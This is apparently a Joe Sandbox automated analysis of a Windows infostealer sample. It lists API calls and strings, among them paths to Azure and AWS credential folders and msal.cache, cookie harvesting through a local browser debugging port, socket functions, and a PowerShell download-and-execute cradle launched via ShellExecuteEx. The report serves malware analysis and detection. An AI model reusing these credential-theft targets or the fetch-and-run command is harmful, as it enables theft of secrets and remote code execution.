                          • Opcode Fuzzy Hash: c6a36046e304ca859151f621e31f93dd328c32381cdb5c96bc049a6a5951fb6d
                          • Instruction Fuzzy Hash: 6DA15C71B102059BCB21ABB9DD89A9F77B9AF44304F04107AF905F72E1DB78DD058BA8
                          APIs
                          • memset.MSVCRT ref: 0041E740
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0041E769
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041E79F
                          • lstrcat.KERNEL32(?,00000000), ref: 0041E7AD
                          • lstrcat.KERNEL32(?,\.azure\), ref: 0041E7C6
                          • memset.MSVCRT ref: 0041E805
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0041E82D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041E85F
                          • lstrcat.KERNEL32(?,00000000), ref: 0041E86D
                          • lstrcat.KERNEL32(?,\.aws\), ref: 0041E886
                          • memset.MSVCRT ref: 0041E8C5
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E8F1
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041E920
                          • lstrcat.KERNEL32(?,00000000), ref: 0041E92E
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 0041E947
                          • memset.MSVCRT ref: 0041E986
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$memset$FolderPathlstrcpy
                          • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 4067350539-3645552435
                          • Opcode ID: 144444f1573a6f041bcdf4305b88e3bf646598b375764b6adbad9f922f3c5a97
                          • Instruction ID: dcd46d6675432c83c652afd316220d76f098c8514ac7530e828c9290d07be6c0
                          • Opcode Fuzzy Hash: 144444f1573a6f041bcdf4305b88e3bf646598b375764b6adbad9f922f3c5a97
                          • Instruction Fuzzy Hash: 1071FC71B40218ABD725EB64DC46FED7374AF48700F5404ADB619AB1C0DFB89A848F9C
                          APIs
                          • lstrcpy.KERNEL32 ref: 0041ABCF
                          • lstrlen.KERNEL32(00FBDCD8), ref: 0041ABE5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041AC0D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0041AC18
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041AC41
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041AC84
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0041AC8E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041ACB7
                          • lstrlen.KERNEL32(00434AD4), ref: 0041ACD1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041ACF3
                          • lstrcat.KERNEL32(00000000,00434AD4), ref: 0041ACFF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041AD28
                          • lstrlen.KERNEL32(00434AD4), ref: 0041AD3A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041AD5C
                          • lstrcat.KERNEL32(00000000,00434AD4), ref: 0041AD68
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041AD91
                          • lstrlen.KERNEL32(00FBDD80), ref: 0041ADA7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041ADCF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0041ADDA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041AE03
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041AE3F
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0041AE49
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041AE6F
                          • lstrlen.KERNEL32(00000000), ref: 0041AE85
                          • lstrcpy.KERNEL32(00000000,00FBDF18), ref: 0041AEB8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen
                          • String ID: f
                          • API String ID: 2762123234-1993550816
                          • Opcode ID: 188521429213a4490580d65eede3cbdd68b32f9f61f7551c6e75461d2c3815fe
                          • Instruction ID: 2ba43ffc6f93962650281a06098b46ffd35bb56c03338a48977137f3e8636df4
                          • Opcode Fuzzy Hash: 188521429213a4490580d65eede3cbdd68b32f9f61f7551c6e75461d2c3815fe
                          • Instruction Fuzzy Hash: 61B17030A116169BCB21EB69DD4C6EFB3B6AF40304F04042AB405A72A1DBB8DD55CFD9
                          APIs
                          • LoadLibraryA.KERNEL32(ws2_32.dll,?,004172A4), ref: 004247E6
                          • GetProcAddress.KERNEL32(00000000,connect), ref: 004247FC
                          • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 0042480D
                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0042481E
                          • GetProcAddress.KERNEL32(00000000,htons), ref: 0042482F
                          • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00424840
                          • GetProcAddress.KERNEL32(00000000,recv), ref: 00424851
                          • GetProcAddress.KERNEL32(00000000,socket), ref: 00424862
                          • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00424873
                          • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00424884
                          • GetProcAddress.KERNEL32(00000000,send), ref: 00424895
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                          • API String ID: 2238633743-3087812094
                          • Opcode ID: f5155ff952da553fc3a3bff4ab4fb1888bde0f0d590b6b3d85c4f9227467158f
                          • Instruction ID: 4af547eeddcfd820e4710940f65f58a2354f142c75a2b38fbde9570d2269516e
                          • Opcode Fuzzy Hash: f5155ff952da553fc3a3bff4ab4fb1888bde0f0d590b6b3d85c4f9227467158f
                          • Instruction Fuzzy Hash: F2119675D52720AF8B149FA5AD0DB963ABABA0E709714391BF151D3160DBF84400DFE4
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0041BE53
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0041BE86
                          • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0041BE91
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041BEB1
                          • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0041BEBD
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041BEE0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0041BEEB
                          • lstrlen.KERNEL32(')"), ref: 0041BEF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041BF13
                          • lstrcat.KERNEL32(00000000,')"), ref: 0041BF1F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041BF46
                          • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0041BF66
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041BF88
                          • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0041BF94
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041BFBA
                          • ShellExecuteEx.SHELL32(?), ref: 0041C00C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 4016326548-898575020
                          • Opcode ID: 93b88900fc31601816e430ac0df2830fc505696a406f936991b5f24f112f10ef
                          • Instruction ID: 38c8f8dad60f1a0c49673f1d29feaec6a6442272fd1057c9bcc558400938cbc4
                          • Opcode Fuzzy Hash: 93b88900fc31601816e430ac0df2830fc505696a406f936991b5f24f112f10ef
                          • Instruction Fuzzy Hash: BA619F71B102159BCB21AFBA8D896EF7BA9EF05304F00143AF405E3291DB78D9468FD8
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0042184F
                          • lstrlen.KERNEL32(00FA6058), ref: 00421860
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00421887
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00421892
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004218C1
                          • lstrlen.KERNEL32(00434FA0), ref: 004218D3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004218F4
                          • lstrcat.KERNEL32(00000000,00434FA0), ref: 00421900
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0042192F
                          • lstrlen.KERNEL32(00FA6068), ref: 00421945
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0042196C
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00421977
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004219A6
                          • lstrlen.KERNEL32(00434FA0), ref: 004219B8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004219D9
                          • lstrcat.KERNEL32(00000000,00434FA0), ref: 004219E5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00421A14
                          • lstrlen.KERNEL32(00FA6078), ref: 00421A2A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00421A51
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00421A5C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00421A8B
                          • lstrlen.KERNEL32(00FA60C8), ref: 00421AA1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00421AC8
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00421AD3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00421B02
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen
                          • String ID:
                          • API String ID: 1049500425-0
                          • Opcode ID: f21290ba87296aa301baa481ae5ffd6d7236596dfacd505c939c513b74ab4786
                          • Instruction ID: 4e92f33e8d426ec36ead6e448680228ec6ca987c2ec4c4eb07e82ab5e04cfdfb
                          • Opcode Fuzzy Hash: f21290ba87296aa301baa481ae5ffd6d7236596dfacd505c939c513b74ab4786
                          • Instruction Fuzzy Hash: C4912FB07017039FD720AFB9ED88A17B7E9AF14344B54542EA886D33A1DB78E845CB64
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00414793
                          • LocalAlloc.KERNEL32(00000040,?), ref: 004147C5
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00414812
                          • lstrlen.KERNEL32(00434B60), ref: 0041481D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041483A
                          • lstrcat.KERNEL32(00000000,00434B60), ref: 00414846
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041486B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00414898
                          • lstrcat.KERNEL32(00000000,00000000), ref: 004148A3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004148CA
                          • StrStrA.SHLWAPI(?,00000000), ref: 004148DC
                          • lstrlen.KERNEL32(?), ref: 004148F0
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00414931
                          • lstrcpy.KERNEL32(00000000,?), ref: 004149B8
                          • lstrcpy.KERNEL32(00000000,?), ref: 004149E1
                          • lstrcpy.KERNEL32(00000000,?), ref: 00414A0A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00414A30
                          • lstrcpy.KERNEL32(00000000,?), ref: 00414A5D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 4107348322-3310892237
                          • Opcode ID: 4b80f5c9a1b5ec993686d8133918b71c1ec12d64141c7639b02f1772728f6fd7
                          • Instruction ID: f336fa1c6ca706a05192d306034da658a1ba66cc2b10bf069ab586907ca8125d
                          • Opcode Fuzzy Hash: 4b80f5c9a1b5ec993686d8133918b71c1ec12d64141c7639b02f1772728f6fd7
                          • Instruction Fuzzy Hash: 01B19071B102069BCB21EF79D989A9F77B5AF84304F05403AF846A7391DB78EC458B98
                          APIs
                            • Part of subcall function 004090C0: InternetOpenA.WININET(0042CFEC,00000001,00000000,00000000,00000000), ref: 004090DF
                            • Part of subcall function 004090C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004090FC
                            • Part of subcall function 004090C0: InternetCloseHandle.WININET(00000000), ref: 00409109
                          • strlen.MSVCRT ref: 004092E1
                          • strlen.MSVCRT ref: 004092FA
                            • Part of subcall function 00408980: std::_Xinvalid_argument.LIBCPMT ref: 00408996
                          • strlen.MSVCRT ref: 00409399
                          • strlen.MSVCRT ref: 004093E6
                          • lstrcat.KERNEL32(?,cookies), ref: 00409547
                          • lstrcat.KERNEL32(?,00431794), ref: 00409559
                          • lstrcat.KERNEL32(?,?), ref: 0040956A
                          • lstrcat.KERNEL32(?,00434B98), ref: 0040957C
                          • lstrcat.KERNEL32(?,?), ref: 0040958D
                          • lstrcat.KERNEL32(?,.txt), ref: 0040959F
                          • lstrlen.KERNEL32(?), ref: 004095B6
                          • lstrlen.KERNEL32(?), ref: 004095DB
                          • lstrcpy.KERNEL32(00000000,?), ref: 00409614
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                          • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                          • API String ID: 1201316467-3542011879
                          • Opcode ID: df8e57aa61c5f2e305b9d3a67dc0815ad7811aea324e54aafe6f9d5a69f4586c
                          • Instruction ID: 05c5ff6c67f5a585ffa253fed58a7d424d5cd25d1d50a03bb6902015a51b916b
                          • Opcode Fuzzy Hash: df8e57aa61c5f2e305b9d3a67dc0815ad7811aea324e54aafe6f9d5a69f4586c
                          • Instruction Fuzzy Hash: 66E12871E00218DBDF14DFA9D984ADEBBB5AF48304F10446AE509B7281DB78AE45CF94
                          APIs
                          • memset.MSVCRT ref: 0041D9A1
                          • memset.MSVCRT ref: 0041D9B3
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0041D9DB
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041DA0E
                          • lstrcat.KERNEL32(?,00000000), ref: 0041DA1C
                          • lstrcat.KERNEL32(?,00FBE020), ref: 0041DA36
                          • lstrcat.KERNEL32(?,?), ref: 0041DA4A
                          • lstrcat.KERNEL32(?,00FBCF80), ref: 0041DA5E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041DA8E
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0041DA95
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0041DAFE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 2367105040-0
                          • Opcode ID: 30b76ee9403a79d3d69e95f151e3111db70670f2e28169058c7bccd52e540d17
                          • Instruction ID: 32da4153a2b2d79e9748dd64895ee3eb06670ecd90bce52be79c4ef31840ac81
                          • Opcode Fuzzy Hash: 30b76ee9403a79d3d69e95f151e3111db70670f2e28169058c7bccd52e540d17
                          • Instruction Fuzzy Hash: 8AB1A2B1E102199FCB10EF64DC889EF77B9AF48304F04496AF506A7290DB789E45CFA4
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040B330
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040B37E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040B3A9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040B3B1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040B3D9
                          • lstrlen.KERNEL32(00434C50), ref: 0040B450
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040B474
                          • lstrcat.KERNEL32(00000000,00434C50), ref: 0040B480
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040B4A9
                          • lstrlen.KERNEL32(00000000), ref: 0040B52D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040B557
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040B55F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040B587
                          • lstrlen.KERNEL32(00434AD4), ref: 0040B5FE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040B622
                          • lstrcat.KERNEL32(00000000,00434AD4), ref: 0040B62E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040B65E
                          • lstrlen.KERNEL32(?), ref: 0040B767
                          • lstrlen.KERNEL32(?), ref: 0040B776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040B79E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
